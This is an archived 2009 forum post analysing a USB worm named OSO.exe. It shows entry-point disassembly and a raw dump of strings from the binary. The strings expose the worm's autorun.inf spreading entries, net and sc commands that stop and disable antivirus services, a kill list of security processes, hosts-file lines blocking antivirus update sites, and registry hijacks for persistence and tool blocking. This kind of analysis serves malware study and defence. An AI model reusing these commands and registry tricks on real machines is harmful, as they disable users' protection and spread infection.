【3.A.S.T】网络安全爱好者's Archiver

黑客学习

2000gaobo 发表于 2009-1-24 17:31

.[U盘感染者]-

.[U盘感染者]-
1.OEP:
有壳,简单的.

oep:
0040C231 55 push ebp
0040C232 8BEC mov ebp,esp
0040C234 B9 29000000 mov ecx,29
0040C239 6A 00 push 0
0040C23B 6A 00 push 0
0040C23D 49 dec ecx
0040C23E ^ 75 F9 jnz short OSO.0040C239
0040C240 51 push ecx
0040C241 53 push ebx
0040C242 56 push esi
0040C243 57 push edi
0040C244 B8 A1C14000 mov eax,OSO.0040C1A1
0040C249 E8 0782FFFF call OSO.00404455
0040C24E 8B1D 2CD14000 mov ebx,dword ptr ds:[40D12C] ; OSO.0040EED4
0040C254 8B35 DCD04000 mov esi,dword ptr ds:[40D0DC] ; OSO.0040EF48

2.文本字符串参考位于 OSO:.text
地址 反汇编 文本字符串
00404C75 mov edx,OSO.00404DA5 ASCII "hx1.bat"
00404C95 mov edx,OSO.00404DB5 ASCII "@echo off"
00404CC2 mov edx,OSO.00404DA5 ASCII "hx1.bat"
00404CE2 mov edx,OSO.00404DC9 ASCII "set date=2004-1-22"
00404CF8 mov edx,OSO.00404DE5 ASCII "ping ** localhost > nul"
00404D0E mov edx,OSO.00404E05 ASCII "date %date%"
00404D24 mov edx,OSO.00404E19 ASCII "del %0"
00404D57 mov edx,OSO.00404DA5 ASCII "hx1.bat"
00404D6A push OSO.00404E21 ASCII "open"
004052ED push OSO.00405339 ASCII "kernel32.dll"
00405305 push OSO.00405349 ASCII "RegisterServiceProcess"
004057C2 mov eax,OSO.0040598D ASCII "lqrs>*)tsr(``642*kcw+66t*q~w"
004057EF mov eax,OSO.004059B5 ASCII "`tn{5+r{p"
00405909 mov eax,OSO.004059C9 ASCII "A}vokwcq*`~f"
0040591F mov eax,OSO.004059E1 ASCII "kucm"
00405A14 mov eax,OSO.00405DC9 ASCII "lqrs>*)tsr(`ps757+eli*ggilh,`jqm*q~w"
00405A41 mov eax,OSO.00405DF9 ASCII "`tn{7+r{p"
00405C59 push OSO.00405E0D ASCII "new"
00405CD3 push OSO.00405E0D ASCII "new"
00405D03 mov eax,OSO.00405E19 ASCII "kucm"
00405D68 push OSO.00405E0D ASCII "new"
00405E9E mov ecx,OSO.004061E1 ASCII "\autorun.inf"
00405EBA mov ecx,OSO.004061F9 ASCII "OSO.exe"
00405EFB mov ecx,OSO.004061E1 ASCII "\autorun.inf"
00405F1E mov ecx,OSO.004061F9 ASCII "OSO.exe"
00405F3C mov ecx,OSO.004061E1 ASCII "\autorun.inf"
00405F5A mov ecx,OSO.004061F9 ASCII "OSO.exe"
00405FE3 mov ecx,OSO.004061F9 ASCII "OSO.exe"
0040609F mov ecx,OSO.004061E1 ASCII "\autorun.inf"
004060C4 mov edx,OSO.00406239 ASCII "[AutoRun]"
004060E7 mov ecx,OSO.004061E1 ASCII "\autorun.inf"
0040610C mov edx,OSO.0040624D ASCII "open=OSO.exe"
00406122 mov edx,OSO.00406265 ASCII "shellexecute=OSO.exe"
00406138 mov edx,OSO.00406285 ASCII "shell\Auto\command=OSO.exe"
0040615D mov ecx,OSO.004061F9 ASCII "OSO.exe"
0040617D mov ecx,OSO.004061E1 ASCII "\autorun.inf"
0040630F mov ecx,OSO.00406585 ASCII "\autorun.inf"
0040632B mov ecx,OSO.0040659D ASCII "OSO.exe"
00406350 mov ecx,OSO.00406585 ASCII "\autorun.inf"
00406373 mov ecx,OSO.0040659D ASCII "OSO.exe"
00406391 mov ecx,OSO.00406585 ASCII "\autorun.inf"
004063AF mov ecx,OSO.0040659D ASCII "OSO.exe"
00406407 mov ecx,OSO.0040659D ASCII "OSO.exe"
00406432 mov ecx,OSO.00406585 ASCII "\autorun.inf"
00406460 mov edx,OSO.004065AD ASCII "[AutoRun]"
00406486 mov ecx,OSO.00406585 ASCII "\autorun.inf"
004064B4 mov edx,OSO.004065C1 ASCII "open=OSO.exe"
004064CD mov edx,OSO.004065D9 ASCII "shellexecute=OSO.exe"
004064E6 mov edx,OSO.004065F9 ASCII "shell\Auto\command=OSO.exe"
0040650E mov ecx,OSO.0040659D ASCII "OSO.exe"
0040652E mov ecx,OSO.00406585 ASCII "\autorun.inf"
00406683 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
0040669F mov ecx,OSO.00406911 ASCII "OSO.exe"
004066C4 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
004066E7 mov ecx,OSO.00406911 ASCII "OSO.exe"
00406705 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
00406723 mov ecx,OSO.00406911 ASCII "OSO.exe"
0040677B mov ecx,OSO.00406911 ASCII "OSO.exe"
004067A6 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
004067D4 mov edx,OSO.00406921 ASCII "[AutoRun]"
004067FA mov ecx,OSO.004068F9 ASCII "\autorun.inf"
00406828 mov edx,OSO.00406935 ASCII "open=OSO.exe"
00406841 mov edx,OSO.0040694D ASCII "shellexecute=OSO.exe"
0040685A mov edx,OSO.0040696D ASCII "shell\Auto\command=OSO.exe"
00406882 mov ecx,OSO.00406911 ASCII "OSO.exe"
004068A2 mov ecx,OSO.004068F9 ASCII "\autorun.inf"
004069F7 mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406A13 mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406A38 mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406A5B mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406A79 mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406A97 mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406AEF mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406B1A mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406B48 mov edx,OSO.00406C95 ASCII "[AutoRun]"
00406B6E mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406B9C mov edx,OSO.00406CA9 ASCII "open=OSO.exe"
00406BB5 mov edx,OSO.00406CC1 ASCII "shellexecute=OSO.exe"
00406BCE mov edx,OSO.00406CE1 ASCII "shell\Auto\command=OSO.exe"
00406BF6 mov ecx,OSO.00406C85 ASCII "OSO.exe"
00406C16 mov ecx,OSO.00406C6D ASCII "\autorun.inf"
00406D6B mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406D87 mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406DAC mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406DCF mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406DED mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406E0B mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406E63 mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406E8E mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406EBC mov edx,OSO.00407009 ASCII "[AutoRun]"
00406EE2 mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
00406F10 mov edx,OSO.0040701D ASCII "open=OSO.exe"
00406F29 mov edx,OSO.00407035 ASCII "shellexecute=OSO.exe"
00406F42 mov edx,OSO.00407055 ASCII "shell\Auto\command=OSO.exe"
00406F6A mov ecx,OSO.00406FF9 ASCII "OSO.exe"
00406F8A mov ecx,OSO.00406FE1 ASCII "\autorun.inf"
004070DF mov ecx,OSO.00407355 ASCII "\autorun.inf"
004070FB mov ecx,OSO.0040736D ASCII "OSO.exe"
00407120 mov ecx,OSO.00407355 ASCII "\autorun.inf"
00407143 mov ecx,OSO.0040736D ASCII "OSO.exe"
00407161 mov ecx,OSO.00407355 ASCII "\autorun.inf"
0040717F mov ecx,OSO.0040736D ASCII "OSO.exe"
004071D7 mov ecx,OSO.0040736D ASCII "OSO.exe"
00407202 mov ecx,OSO.00407355 ASCII "\autorun.inf"
00407230 mov edx,OSO.0040737D ASCII "[AutoRun]"
00407256 mov ecx,OSO.00407355 ASCII "\autorun.inf"
00407284 mov edx,OSO.00407391 ASCII "open=OSO.exe"
0040729D mov edx,OSO.004073A9 ASCII "shellexecute=OSO.exe"
004072B6 mov edx,OSO.004073C9 ASCII "shell\Auto\command=OSO.exe"
004072DE mov ecx,OSO.0040736D ASCII "OSO.exe"
004072FE mov ecx,OSO.00407355 ASCII "\autorun.inf"
00407453 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
0040746F mov ecx,OSO.004076E1 ASCII "OSO.exe"
00407494 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004074B7 mov ecx,OSO.004076E1 ASCII "OSO.exe"
004074D5 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004074F3 mov ecx,OSO.004076E1 ASCII "OSO.exe"
0040754B mov ecx,OSO.004076E1 ASCII "OSO.exe"
00407576 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004075A4 mov edx,OSO.004076F1 ASCII "[AutoRun]"
004075CA mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004075F8 mov edx,OSO.00407705 ASCII "open=OSO.exe"
00407611 mov edx,OSO.0040771D ASCII "shellexecute=OSO.exe"
0040762A mov edx,OSO.0040773D ASCII "shell\Auto\command=OSO.exe"
00407652 mov ecx,OSO.004076E1 ASCII "OSO.exe"
00407672 mov ecx,OSO.004076C9 ASCII "\autorun.inf"
004077A0 mov eax,OSO.00407AAD ASCII "D&" *mrn"
0040781C mov eax,OSO.00407AC1 ASCII "lqrs>*)tsr(``642*fin"
00407835 mov eax,OSO.00407AE1 ASCII "lqrs>*)tsr(``642*kcw"
0040784E mov eax,OSO.00407B01 ASCII "lqrs>*)tsr(532?43+eli"
00407867 mov eax,OSO.00407B21 ASCII "lqrs>*)tsr(`ps757+eli"
00407880 mov eax,OSO.00407B21 ASCII "lqrs>*)tsr(`ps757+eli"
004078A3 mov eax,OSO.00407AAD ASCII "D&" *mrn"
004078DC mov eax,OSO.00407B41 ASCII "8CTBI@UFP;"
00407922 mov eax,OSO.00407AAD ASCII "D&" *mrn"
0040795B mov eax,OSO.00407B55 ASCII "8CTBI@&pvf;!"
0040796E mov eax,OSO.00407B6D ASCII "&;"
004079A9 mov eax,OSO.00407B79 ASCII "8*@QEHCPAQ8"
00407A39 mov eax,OSO.00407B8D ASCII "A}vokwcq*`~f"
00407A4F mov eax,OSO.00407BA5 ASCII "kucm"
00407C24 mov edx,OSO.00408101 ASCII "severe.exe"
004082F6 push OSO.004086E5 ASCII "stop srservice"
004082FB push OSO.004086F5 ASCII "net.exe"
00408300 push OSO.004086FD ASCII "open"
00408310 push OSO.00408705 ASCII "config srservice start= disabled"
00408315 push OSO.00408729 ASCII "sc.exe"
0040831A push OSO.004086FD ASCII "open"
0040832A push OSO.00408731 ASCII "stop sharedaccess"
0040832F push OSO.004086F5 ASCII "net.exe"
00408334 push OSO.004086FD ASCII "open"
00408344 push OSO.00408745 ASCII "stop KVWSC"
00408349 push OSO.004086F5 ASCII "net.exe"
0040834E push OSO.004086FD ASCII "open"
0040835E push OSO.00408751 ASCII "config KVWSC start= disabled"
00408363 push OSO.00408729 ASCII "sc.exe"
00408368 push OSO.004086FD ASCII "open"
00408378 push OSO.00408771 ASCII "stop KVSrvXP"
0040837D push OSO.004086F5 ASCII "net.exe"
00408382 push OSO.004086FD ASCII "open"
00408392 push OSO.00408781 ASCII "config KVSrvXP start= disabled"
00408397 push OSO.00408729 ASCII "sc.exe"
0040839C push OSO.004086FD ASCII "open"
004083AC push OSO.004087A1 ASCII "stop kavsvc"
004083B1 push OSO.004086F5 ASCII "net.exe"
004083B6 push OSO.004086FD ASCII "open"
004083C6 push OSO.004087AD ASCII "config kavsvc start= disabled"
004083CB push OSO.00408729 ASCII "sc.exe"
004083D0 push OSO.004086FD ASCII "open"
004083E0 push OSO.004087CD ASCII "config RsRavMon start= disabled"
004083E5 push OSO.00408729 ASCII "sc.exe"
004083EA push OSO.004086FD ASCII "open"
004083FA push OSO.004087ED ASCII "stop RsCCenter"
004083FF push OSO.004086F5 ASCII "net.exe"
00408404 push OSO.004086FD ASCII "open"
00408414 push OSO.004087FD ASCII "config RsCCenter start= disabled"
00408419 push OSO.00408729 ASCII "sc.exe"
0040841E push OSO.004086FD ASCII "open"
0040842E push OSO.00408821 ASCII "stop RsRavMon"
00408433 push OSO.004086F5 ASCII "net.exe"
00408438 push OSO.004086FD ASCII "open"
00408453 push OSO.0040883D ASCII "#32770"
00408462 push OSO.0040884D ASCII "Button"
00408482 mov eax,OSO.0040885D ASCII "sc.exe"
0040848C mov eax,OSO.0040886D ASCII "cmd.exe"
00408496 mov eax,OSO.0040887D ASCII "net.exe"
004084A0 mov eax,OSO.0040888D ASCII "sc1.exe"
004084AA mov eax,OSO.0040889D ASCII "net1.exe"
004084B4 mov eax,OSO.004088B1 ASCII "PFW.exe"
004084BE mov eax,OSO.004088C1 ASCII "Kav.exe"
004084C8 mov eax,OSO.004088D1 ASCII "KVOL.exe"
004084D2 mov eax,OSO.004088E5 ASCII "KVFW.exe"
004084DC mov eax,OSO.004088F9 ASCII "adam.exe"
004084E6 mov eax,OSO.0040890D ASCII "qqav.exe"
004084F0 mov eax,OSO.00408921 ASCII "qqkav.exe"
004084FA mov eax,OSO.00408935 ASCII "TBMon.exe"
00408504 mov eax,OSO.00408949 ASCII "kav32.exe"
0040850E mov eax,OSO.0040895D ASCII "kvwsc.exe"
00408518 mov eax,OSO.00408971 ASCII "CCAPP.exe"
00408522 mov eax,OSO.00408985 ASCII "KRegEx.exe"
0040852C mov eax,OSO.00408999 ASCII "kavsvc.exe"
00408536 mov eax,OSO.004089AD ASCII "VPTray.exe"
00408540 mov eax,OSO.004089C1 ASCII "RAVMON.exe"
0040854A mov eax,OSO.004089D5 ASCII "EGHOST.exe"
00408554 mov eax,OSO.004089E9 ASCII "KavPFW.exe"
0040855E mov eax,OSO.004089FD ASCII "SHSTAT.exe"
00408568 mov eax,OSO.00408A11 ASCII "RavTask.exe"
00408572 mov eax,OSO.00408A25 ASCII "TrojDie.kxp"
0040857C mov eax,OSO.00408A39 ASCII "Iparmor.exe"
00408586 mov eax,OSO.00408A4D ASCII "MAILMON.exe"
00408590 mov eax,OSO.00408A61 ASCII "MCAGENT.exe"
0040859A mov eax,OSO.00408A75 ASCII "KAVPLUS.exe"
004085A4 mov eax,OSO.00408A89 ASCII "RavMonD.exe"
004085AE mov eax,OSO.00408A9D ASCII "Rtvscan.exe"
004085B8 mov eax,OSO.00408AB1 ASCII "Nvsvc32.exe"
004085C2 mov eax,OSO.00408AC5 ASCII "KVMonXP.exe"
004085CC mov eax,OSO.00408AD9 ASCII "Kvsrvxp.exe"
004085D6 mov eax,OSO.00408AED ASCII "CCenter.exe"
004085E0 mov eax,OSO.00408B01 ASCII "KpopMon.exe"
004085EA mov eax,OSO.00408B15 ASCII "RfwMain.exe"
004085F4 mov eax,OSO.00408B29 ASCII "KWATCHUI.exe"
004085FE mov eax,OSO.00408B41 ASCII "MCVSESCN.exe"
00408608 mov eax,OSO.00408B59 ASCII "MSKAGENT.exe"
00408612 mov eax,OSO.00408B71 ASCII "kvolself.exe"
0040861C mov eax,OSO.00408B89 ASCII "KVCenter.kxp"
00408626 mov eax,OSO.00408BA1 ASCII "kavstart.exe"
00408630 mov eax,OSO.00408BB9 ASCII "RAVTIMER.exe"
0040863A mov eax,OSO.00408BD1 ASCII "RRfwMain.exe"
00408644 mov eax,OSO.00408BE9 ASCII "FireTray.exe"
0040864E mov eax,OSO.00408C01 ASCII "UpdaterUI.exe"
00408658 mov eax,OSO.00408C19 ASCII "KVSrvXp_1.exe"
00408662 mov eax,OSO.00408C31 ASCII "RavService.exe"
00408C70 mov ecx,OSO.004090D9 ASCII "drivers\etc\"
00408C90 mov ecx,OSO.004090F1 ASCII "hosts"
00408CAE mov ecx,OSO.004090F1 ASCII "hosts"
00408CCC mov ecx,OSO.004090F1 ASCII "hosts"
00408CF6 mov edx,OSO.004090F9 ASCII "127.0.0.1 localhost"
00408D1B mov ecx,OSO.004090F1 ASCII "hosts"
00408D45 mov edx,OSO.00409115 ASCII "127.0.0.1 mmsk.cn"
00408D5B mov edx,OSO.0040912D ASCII "127.0.0.1 ikaka.com"
00408D71 mov edx,OSO.00409149 ASCII "127.0.0.1 safe.qq.com"
00408D87 mov edx,OSO.00409165 ASCII "127.0.0.1 360safe.com"
00408D9D mov edx,OSO.00409181 ASCII "127.0.0.1 [url=http://www.mmsk.cn]www.mmsk.cn[/url]"
00408DB3 mov edx,OSO.0040919D ASCII "127.0.0.1 [url=http://www.ikaka.com]www.ikaka.com[/url]"
00408DC9 mov edx,OSO.004091BD ASCII "127.0.0.1 tool.ikaka.com"
00408DDF mov edx,OSO.004091DD ASCII "127.0.0.1 [url=http://www.360safe.com]www.360safe.com[/url]"
00408DF5 mov edx,OSO.004091FD ASCII "127.0.0.1 zs.kingsoft.com"
00408E0B mov edx,OSO.0040921D ASCII "127.0.0.1 forum.ikaka.com"
00408E21 mov edx,OSO.0040923D ASCII "127.0.0.1 up.rising.com.cn"
00408E37 mov edx,OSO.00409261 ASCII "127.0.0.1 scan.kingsoft.com"
00408E4D mov edx,OSO.00409285 ASCII "127.0.0.1 kvup.jiangmin.com"
00408E63 mov edx,OSO.004092A9 ASCII "127.0.0.1 reg.rising.com.cn"
00408E79 mov edx,OSO.004092CD ASCII "127.0.0.1 update.rising.com.cn"
00408E8F mov edx,OSO.004092F5 ASCII "127.0.0.1 update7.jiangmin.com"
00408EA5 mov edx,OSO.0040931D ASCII "127.0.0.1 download.rising.com.cn"
00408EBB mov edx,OSO.00409345 ASCII "127.0.0.1 dnl-us1.kaspersky-labs.com"
00408ED1 mov edx,OSO.00409371 ASCII "127.0.0.1 dnl-us2.kaspersky-labs.com"
00408EE7 mov edx,OSO.0040939D ASCII "127.0.0.1 dnl-us3.kaspersky-labs.com"
00408EFD mov edx,OSO.004093C9 ASCII "127.0.0.1 dnl-us4.kaspersky-labs.com"
00408F13 mov edx,OSO.004093F5 ASCII "127.0.0.1 dnl-us5.kaspersky-labs.com"
00408F29 mov edx,OSO.00409421 ASCII "127.0.0.1 dnl-us6.kaspersky-labs.com"
00408F3F mov edx,OSO.0040944D ASCII "127.0.0.1 dnl-us7.kaspersky-labs.com"
00408F55 mov edx,OSO.00409479 ASCII "127.0.0.1 dnl-us8.kaspersky-labs.com"
00408F6B mov edx,OSO.004094A5 ASCII "127.0.0.1 dnl-us9.kaspersky-labs.com"
00408F81 mov edx,OSO.004094D1 ASCII "127.0.0.1 dnl-us10.kaspersky-labs.com"
00408F97 mov edx,OSO.004094FD ASCII "127.0.0.1 dnl-eu1.kaspersky-labs.com"
00408FAD mov edx,OSO.00409529 ASCII "127.0.0.1 dnl-eu2.kaspersky-labs.com"
00408FC3 mov edx,OSO.00409555 ASCII "127.0.0.1 dnl-eu3.kaspersky-labs.com"
00408FD9 mov edx,OSO.00409581 ASCII "127.0.0.1 dnl-eu4.kaspersky-labs.com"
00408FEF mov edx,OSO.004095AD ASCII "127.0.0.1 dnl-eu5.kaspersky-labs.com"
00409005 mov edx,OSO.004095D9 ASCII "127.0.0.1 dnl-eu6.kaspersky-labs.com"
0040901B mov edx,OSO.00409605 ASCII "127.0.0.1 dnl-eu7.kaspersky-labs.com"
00409031 mov edx,OSO.00409631 ASCII "127.0.0.1 dnl-eu8.kaspersky-labs.com"
00409047 mov edx,OSO.0040965D ASCII "127.0.0.1 dnl-eu9.kaspersky-labs.com"
0040905D mov edx,OSO.00409689 ASCII "127.0.0.1 dnl-eu10.kaspersky-labs.com"
0040908E mov ecx,OSO.004090F1 ASCII "hosts"
004096E0 mov edx,OSO.0040986D ASCII "noruns.reg"
00409703 mov edx,OSO.0040986D ASCII "noruns.reg"
00409725 mov edx,OSO.00409881 ASCII "Windows Registry Editor Version 5.00"
00409750 mov edx,OSO.0040986D ASCII "noruns.reg"
00409785 mov edx,OSO.004098B1 ASCII "[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"
0040979B mov edx,OSO.00409909 ASCII ""NoDriveTypeAutoRun"=dword:b5"
004097C9 push OSO.00409931 ASCII " /s "
004097D9 push OSO.0040986D ASCII "noruns.reg"
004097F4 push OSO.00409939 ASCII "regedit.exe"
004097F9 push OSO.00409945 ASCII "open"
0040980F mov eax,OSO.00409955 ASCII "regedit.exe"
00409824 mov edx,OSO.0040986D ASCII "noruns.reg"
0040998C mov eax,OSO.004099AD ASCII "QQ.exe"
004099BE push OSO.00409AAD ASCII "#32770"
00409B12 push OSO.0040A469 ASCII ".exe"
00409B38 mov edx,OSO.0040A471 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00409B52 mov edx,OSO.0040A4A9 ASCII "severe.exe"
00409B75 mov edx,OSO.0040A471 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00409B84 push OSO.0040A4BD ASCII "Explorer.exe "
00409B94 push OSO.0040A4D5 ASCII "drivers\"
00409B99 push OSO.0040A4E9 ASCII "conime.exe"
00409BB6 mov ecx,OSO.0040A4F5 ASCII "Shell"
00409BBB mov edx,OSO.0040A4FD ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
00409BD1 mov ecx,OSO.0040A539 ASCII "CheckedValue"
00409BD6 mov edx,OSO.0040A549 ASCII "software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall"
00409BF0 push OSO.0040A4D5 ASCII "drivers\"
00409BF7 push OSO.0040A469 ASCII ".exe"
00409C14 mov ecx,OSO.0040A59D ASCII "Debugger"
00409C19 mov edx,OSO.0040A5A9 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe"
00409C33 push OSO.0040A4D5 ASCII "drivers\"
00409C3A push OSO.0040A469 ASCII ".exe"
00409C57 mov ecx,OSO.0040A59D ASCII "Debugger"
00409C5C mov edx,OSO.0040A601 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe"
00409C76 push OSO.0040A4D5 ASCII "drivers\"
00409C7D push OSO.0040A469 ASCII ".exe"
00409C9A mov ecx,OSO.0040A59D ASCII "Debugger"
00409C9F mov edx,OSO.0040A655 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com"
00409CB9 push OSO.0040A4D5 ASCII "drivers\"
00409CC0 push OSO.0040A469 ASCII ".exe"
00409CDD mov ecx,OSO.0040A59D ASCII "Debugger"
00409CE2 mov edx,OSO.0040A6A9 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe"
00409CFC push OSO.0040A4D5 ASCII "drivers\"
00409D03 push OSO.0040A469 ASCII ".exe"
00409D20 mov ecx,OSO.0040A59D ASCII "Debugger"
00409D25 mov edx,OSO.0040A6FD ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe"
00409D3F push OSO.0040A4D5 ASCII "drivers\"
00409D46 push OSO.0040A469 ASCII ".exe"
00409D63 mov ecx,OSO.0040A59D ASCII "Debugger"
00409D68 mov edx,OSO.0040A755 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe"
00409D82 push OSO.0040A4D5 ASCII "drivers\"
00409D89 push OSO.0040A469 ASCII ".exe"
00409DA6 mov ecx,OSO.0040A59D ASCII "Debugger"
00409DAB mov edx,OSO.0040A7AD ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp"
00409DC5 push OSO.0040A4D5 ASCII "drivers\"
00409DCC push OSO.0040A469 ASCII ".exe"
00409DE9 mov ecx,OSO.0040A59D ASCII "Debugger"
00409DEE mov edx,OSO.0040A801 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp"
00409E08 push OSO.0040A4D5 ASCII "drivers\"
00409E0F push OSO.0040A469 ASCII ".exe"
00409E2C mov ecx,OSO.0040A59D ASCII "Debugger"
00409E31 mov edx,OSO.0040A859 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp"
00409E4B push OSO.0040A4D5 ASCII "drivers\"
00409E52 push OSO.0040A469 ASCII ".exe"
00409E6F mov ecx,OSO.0040A59D ASCII "Debugger"
00409E74 mov edx,OSO.0040A8B1 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe"
00409E8E push OSO.0040A4D5 ASCII "drivers\"
00409E95 push OSO.0040A469 ASCII ".exe"
00409EB2 mov ecx,OSO.0040A59D ASCII "Debugger"
00409EB7 mov edx,OSO.0040A909 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe"
00409ED1 push OSO.0040A4D5 ASCII "drivers\"
00409ED8 push OSO.0040A469 ASCII ".exe"
00409EF5 mov ecx,OSO.0040A59D ASCII "Debugger"
00409EFA mov edx,OSO.0040A95D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe"
00409F14 push OSO.0040A4D5 ASCII "drivers\"
00409F1B push OSO.0040A469 ASCII ".exe"
00409F38 mov ecx,OSO.0040A59D ASCII "Debugger"
00409F3D mov edx,OSO.0040A9B9 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe"
00409F5D push OSO.0040A4D5 ASCII "drivers\"
00409F64 push OSO.0040A469 ASCII ".exe"
00409F81 mov ecx,OSO.0040A59D ASCII "Debugger"
00409F86 mov edx,OSO.0040AA11 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe"
00409FA6 push OSO.0040A4D5 ASCII "drivers\"
00409FAD push OSO.0040A469 ASCII ".exe"
00409FD0 mov ecx,OSO.0040A59D ASCII "Debugger"
00409FD5 mov edx,OSO.0040AA69 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe"
00409FF5 push OSO.0040A4D5 ASCII "drivers\"
00409FFC push OSO.0040A469 ASCII ".exe"
0040A01F mov ecx,OSO.0040A59D ASCII "Debugger"
0040A024 mov edx,OSO.0040AAC1 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe"
0040A044 push OSO.0040A4D5 ASCII "drivers\"
0040A04B push OSO.0040A469 ASCII ".exe"
0040A06E mov ecx,OSO.0040A59D ASCII "Debugger"
0040A073 mov edx,OSO.0040AB19 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe"
0040A093 push OSO.0040A4D5 ASCII "drivers\"
0040A09A push OSO.0040A469 ASCII ".exe"
0040A0BD mov ecx,OSO.0040A59D ASCII "Debugger"
0040A0C2 mov edx,OSO.0040AB6D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe"
0040A0E2 push OSO.0040A4D5 ASCII "drivers\"
0040A0E9 push OSO.0040A469 ASCII ".exe"
0040A10C mov ecx,OSO.0040A59D ASCII "Debugger"
0040A111 mov edx,OSO.0040ABC5 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe"
0040A131 push OSO.0040A4D5 ASCII "drivers\"
0040A138 push OSO.0040A469 ASCII ".exe"
0040A15B mov ecx,OSO.0040A59D ASCII "Debugger"
0040A160 mov edx,OSO.0040AC1D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE"
0040A180 push OSO.0040A4D5 ASCII "drivers\"
0040A187 push OSO.0040A469 ASCII ".exe"
0040A1AA mov ecx,OSO.0040A59D ASCII "Debugger"
0040A1AF mov edx,OSO.0040AC71 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe"
0040A1CF push OSO.0040A4D5 ASCII "drivers\"
0040A1D6 push OSO.0040A469 ASCII ".exe"
0040A1F9 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A1FE mov edx,OSO.0040ACC5 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe"
0040A21E push OSO.0040A4D5 ASCII "drivers\"
0040A225 push OSO.0040A469 ASCII ".exe"
0040A248 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A24D mov edx,OSO.0040AD1D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe"
0040A26D push OSO.0040A4D5 ASCII "drivers\"
0040A274 push OSO.0040A469 ASCII ".exe"
0040A297 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A29C mov edx,OSO.0040AD75 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com"
0040A2BC push OSO.0040A4D5 ASCII "drivers\"
0040A2C3 push OSO.0040A469 ASCII ".exe"
0040A2E6 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A2EB mov edx,OSO.0040ADCD ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com"
0040A30B push OSO.0040A4D5 ASCII "drivers\"
0040A312 push OSO.0040A469 ASCII ".exe"
0040A335 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A33A mov edx,OSO.0040AE25 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe"
0040A35A push OSO.0040A4D5 ASCII "drivers\"
0040A361 push OSO.0040A469 ASCII ".exe"
0040A384 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A389 mov edx,OSO.0040AE79 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe"
0040A3A9 push OSO.0040A4D5 ASCII "drivers\"
0040A3B0 push OSO.0040A469 ASCII ".exe"
0040A3D3 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A3D8 mov edx,OSO.0040AED5 ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe"
